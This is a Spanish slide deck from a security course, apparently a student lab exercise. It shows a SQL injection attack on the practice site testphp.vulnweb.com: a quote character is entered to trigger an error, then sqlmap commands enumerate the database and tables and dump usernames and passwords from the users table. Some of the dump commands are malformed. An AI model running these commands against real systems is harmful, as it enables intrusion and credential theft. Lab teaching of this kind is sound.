2. ataque por inyección de código sql a sitio web
Descargar como PPTX, PDF0 recomendaciones629 vistas
El documento describe un ataque de inyección de código SQL en el sitio web http://testphp.vulnweb.com, donde se extrae información crítica de la base de datos, como tipos de servidor y nombres de tablas. Se emplean comandos de sqlmap para identificar la vulnerabilidad y recuperar datos específicos de la tabla de usuarios. Finalmente, se logra obtener información sensible de los campos de la tabla, como nombres de usuario y contraseñas.
2. ataque por inyección de código sql a sitio web
- 1. Especialización en Seguridad Informática Ataque por inyección de código SQL a sitio Web JOSÉ ALFREDO RAMÍREZ PRADA Espinal, Septiembre de 2014
- 2. Ataque a sitio Web http://testphp.vulnweb.com Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.
- 3. Ataque a sitio Web http://testphp.vulnweb.com Se inicia el ataque en la pagina Web, por ejemplo se introduce una comilla en el campo “Search” del formulario «Browse artists", seguidamente en la direccion URL despues del signo igual se escribe una comilla sencilla (´) y observamos un mensaje de error SQL.
- 4. Identificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:sqlmap sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db Se confirma la vulnerabilidad y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 5.0.11 y el servidor Web PHP 5.3.10, el nombre de la base de datos ‘ACUART'. Ataque a sitio Web http://testphp.vulnweb.com
- 5. Ataque a sitio Web http://testphp.vulnweb.com Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando: sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
- 6. Ataque a sitio Web http://testphp.vulnweb.com una vez identificada la tabla (users) podremos identificar información de las columnas, correspondientemente con los siguientes comandos: sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
- 7. Ataque a sitio Web http://testphp.vulnweb.com una vez identificadas las columnas de la tabla procedemos a verificar la información de los campos “uname, pass, name” de la tabla users, sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C uname --dump sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C pass --dump sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C name --dump
- 8. Ataque a sitio Web http://testphp.vulnweb.com De esta forma obtenemos toda la información de la base de datos del sitio Web.
- 9. Especialización en Seguridad Informática